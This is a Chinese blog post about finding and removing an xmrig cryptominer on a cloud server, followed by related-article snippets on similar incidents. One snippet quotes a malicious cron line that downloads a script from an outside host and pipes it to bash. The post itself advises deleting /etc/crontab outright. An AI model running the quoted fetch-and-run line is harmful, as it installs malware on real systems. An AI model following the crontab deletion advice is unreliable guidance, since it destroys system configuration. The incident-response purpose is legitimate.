关于从ssh发现云主机中挖矿病毒的全流程与解决方式

已于 2024-07-02 08:13:11 修改
阅读量372 收藏 3
点赞数 1
分类专栏: Linux 云计算 文章标签: ssh 运维
于 2024-04-02 14:11:56 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Tassel_YUE/article/details/137268378
版权

前提

今天想登录主机学习一下nginx,突然发现ssh登不上,于是上console看了眼,发现监控中cpu100%,从3/31号突然开始

发现

先通过top发现有一个pid141778的进程,名为xmrig,cpu占用率98%+。
通过百度查,发现这是一个挖矿病毒。于是根据网上的方式进行修复。
(图源网络)
在这里插入图片描述

修复

pkill进程

pkill 141778
通过这条命令kill到这个进程,后一分钟又自动启动了这个进程,于是去查看这个程序执行的具体文件。

ll进程信息

ll /proc/141778

lrwxrwxrwx 1 root root 0 Jul 11 13:04 exe -> /root/c3pools

删除该文件

rm -rf ~/c3pools

(未遇到)定时任务查询

在百度查询时,发现有些博客也回应了有可能有定时任务的可能。使用crontab -l查询

  1. 查询
    crontab -l
  2. 删除
    rm -rf /etc/crontab

ssh问题?

其实ssh并不是挖矿病毒导致的…………实际上是因为连着校园网,学校的某些配置禁用掉了…………
不过为了安全,云上还是建议给ssh的默认端口改掉

vim /etc/ssh/sshd_config
Port 22222

systemctl restart sshd
Tassel_YUE
关注
专栏目录
解决挖矿病毒(定时任务、计划任务、系统定时器、定时启动、crontab、入侵)
墨痕诉清风的博客
05-15 7405
在阿里云使用redis,开启了6379端口,但是当时并没有对redis的密码进行设置。在晚上一点左右。阿里云给我发短信,告诉我服务器出现紧急安事件。建议登录云盾-态势感知控制台查看详情和处理。于是早上开启电脑,连接服务器,使用top查看cpu状态。结果显示进程占用cpu99%以上。在网上百度,了解到qW3xT.2是一个挖矿病毒。也就是说别人利用你的电脑挖矿。谋取利益。解决办法:1、首先解决redis入口问题,因为最开始没有设置密码,所以首先修改redis.conf。设置密码,然后重启redis。
挖矿病毒 kdevtmpfsi 处理
owenzhang的博客
11-30 863
我参与11月更文挑战的第21天,活动详情查看:2021最后一次更文挑战 症状表现 服务器CPU资源使用一直处于100%的状态,通过 top 命令查看,发现可疑进程 kdevtmpfsi。通过 google搜索,发现这是挖矿病毒。 排查方法 首先:查看 kdevtmpfsi 进程,使用 ps -ef | grep kdevtmpfsi ps -ef | grep kinsing命...
云主机挖矿解决方法
qq_38472451的博客
08-22 3226
云主机挖矿解决方法
根除矿机病毒xmrig
最新发布
qq_19582693的博客
07-28 1024
根除xmrig矿机病毒
云算力保卫战 云主机挖矿治理“三步半”
Sophya89的博客
06-14 3501
【2022年6月14日】“挖矿”行为的危害无需多言。自去年以来,我国虚拟货币监管政策持续加码,清退“挖矿”活动与禁止相关业务活动双管齐下,力打击治理违法“挖矿”行为。就如上面这个通告说明的一样,虽然运营商、服务商已经面禁止云主机挖矿,却仍有不少“矿工”会千方百计,发动无差别攻击去寻找“矿机”,而疏于防范的云主机便是他们的猎物之一。 沦为“矿机”的云主机,危害有大? 首先,“挖矿”需要一个庞大的算力系统,会完吞噬用户的云算力,云主机CPU飚满,直接影响企业的正常业务往来,更会付出额外的电...
解决挖矿病毒 sshd2(redis未设密码、清除crontab定时任务)
zetor的专栏
08-31 1595
解决挖矿病毒(redis未设密码、清除crontab定时任务) 在天翼云使用redis,开启了6379端口,但是当时未对redis设置密码、导致挖矿病毒入侵,如图: 此病毒,详细执行效果,请参考文章: https://www.freebuf.com/column/211777.html 此病毒在启动后,会占用主机cpu至99%,且由定时任务拉起,比较顽固,在清除进程的同时,要清除定时任务, 详细如下: 1. 如不使用linux定时任务,crontab,可清除 rm -.
记一次阿里云服务器被挖矿的经历
热门推荐
key_768的博客
04-17 1万+
挖矿 大早上起来,发现被“挖矿”了,云服务器在大晚上发了几条警告消息 真TM恶心,它伪装成一个程序,占有99%的内存,通过借助大量计算能力去做别的事情 解决 top命令查占有进程 会出现这种占有99.9%的进程 PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND ...
大佬们云服务器被挖矿了怎么解决
qq_43521809的博客
08-30 4281
今天收到阿里云的短信,发现机器被挖矿了,但是top查看进程并没有看到cpu高的进程,这个情况下束手无策,大佬们都是怎么排查解决
Docker Remote API 未授权访问导致挖矿病毒入侵
SecGuard
06-09 2642
运维同事反映一台阿里云测试机,反映很慢,除了跑一些docker容器,没有其他服务。 ps -ef查看当前进程,发现存在多个cryptonight加密货币的挖矿进程,分别为proc, thisxxs, xmrig: 对这些进程的所在路径进行排查,使用lsof工具查看它们打开的文件:进程所使用的文件都已经找不到,初步判断是被删除。 换个思路(间尝试过各种假设)扫描该服务器,发现开放...
从本地上传 大文件小文件 到需要 SSH密钥登录 的 阿里云ECS
weixin_38173265的博客
01-06 3357
从本地上传 大文件小文件 到需要 SSH密钥登录 的 阿里云ECS
挖矿蠕虫肆虐,详解云防火墙如何轻松“制敌”
阿里云技术
05-09 848
根据阿里云安团队发布的《2018年云上挖矿分析报告》显示,过去一年,每一波热门0 Day的出现都伴随着挖矿蠕虫的爆发性传播,挖矿蠕虫可能因为占用系统资源导致业务断,甚至还有部分挖矿蠕虫同时会捆绑勒索病毒(如XBash等)给企业带来资金与数据的损失。 如何提升企业的安水位,抵御挖矿蠕虫的威胁成为每个企业都在思考的问题。本文以云上环境为例,从挖矿蠕虫的防御、检测和入侵后如何迅速止血三方面来阐...
Linux&HPC并行计算集群挖矿病毒临时解决方法及预防方法研究
qq_27815483的博客
06-24 1967
本文旨在研究当Linux或HPC集群挖矿病毒之后临时解决方法及如何预防挖矿病毒的攻击,旨在保护我们的Linux集群环境稳定健康的运行
再一次被入侵之潜伏的挖矿病毒
范一刀的博客
03-08 1938
今天是11月10号,正在忙着做双十一凌晨流量冲击的加固工作,登录xx服务器的时候无意间发现CPU的使用率达到了70%,按常理分析,xx服务器资源不会使用这么高的,ps 排序一下进程资源使用,如下图: 果然,有一个高负载的进程“-sh”,占用CPU达到了599%, 据经验分析,这绝逼又是一个病毒程序,一想到这整个人都兴奋起来了,当即着手查一下; 查监控历史 监控的阈值设置的90%,70%一直...
服务器被黑客攻击和被挖矿之后的SSH防御 | SSH security defense after server is hacked and mined
Yl
05-04 2955
PS:本人非专业网络安攻防人员,仅为个人实践经验。本文可能难免有不当之处,欢迎您的讨论和指导。 1. 确定服务器是否被黑客攻击和被挖矿 确认服务器是否出现被黑客攻击和被挖矿等异常情况的方法有: 1.1. 查看显卡使用是否异常 使用nvidia-smi或其他命令发现显卡使用出现异常,如: 显卡被某用户的不明进程占用,且利用率很高甚至为100%。 1.2. 查看进程信息是否异常 使用top或其他命令发现进程出现异常,如: 某用户的进程运行命令出现了eth、coin、wallet、pool或其他与挖矿
最新挖矿病毒xmrig清除方法和原理
m0_73140589的博客
03-21 3814
手机端接收短信提醒,服务器正遭受挖矿病毒攻击,服务器的cpu和内存占用高,阿里云不断告警
记一次排查xmirg挖矿程序_xmirg 关闭,腾讯T3手把手教你
2401_84140140的博客
04-09 967
卧槽,真被盯上了,不要慌,我们先看看这个进程在哪里,我们通过以下命令查看进制的执行路径也可以直接查询当前文件根据查询出来的程序地址进入到当前的文件目录下面,然后直接把这个文件目录下的文件删除了,当然,一般他都会自行创建一个单独的文件存放这些东西,如果不是的话,如果自己不认识那些有用那些没用就上报此次挖矿程序,俗称:“自己搞不定,那就给能搞定的人去处理”,哈哈。如果是单独的文件的话,删除了然后kill掉这个进程你以为这就完了吗?当然没有,我们还要查看有没有自启动这个程序的,
Xmrig挖矿入侵服务器排查
BothSavage
03-19 1022
挖矿程序入侵
记录一次腾讯云木马攻击
wenzhenyu1990的专栏
05-24 1036
客户服务运行越来越慢,今天居然挂了,上服务去看free -h 发现服务器内存消耗巨大,top查看果然xmrig以及.libs进程消耗掉了大部分cpu和内存。 直接kill发现还是会继续存在 于是执行crontab -l 发现 30 23 * * * (curl -s http://w.apacheorg.top:1234/xmss||wget -q -O - http://w.apacheorg.top:1234/xmss )|bash -sh 下载 http://w.apacheo...
我的服务器被挖矿了,原因居然是...
qq_44005305的博客
06-24 1120
比特币系统每隔一段时间就会在节点上生成一个随机代码,互联网的所有设备都可以寻找这个代码,谁先找到就能获得奖励。而寻找代码的过程,就是挖矿。设备通过计算来筛选出符合条件的随机代码,每找到一个随机代码往往需要上万亿次的哈希运算,CPU通常会被顶到100%。为了降低成本,黑客往往会通过入侵的方式,控制别人的计算机来帮自己挖矿
SSH框架解决文乱码问题与Oracle插入方案
"本文主要探讨如何在SSH(Struts、Spring、Hibernate)框架下解决文乱码问题,包括在Web应用程序显示乱码以及在向Oracle数据库插入数据时出现的乱码问题。" SSH框架是Java Web开发常用的一套整合框架,由...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值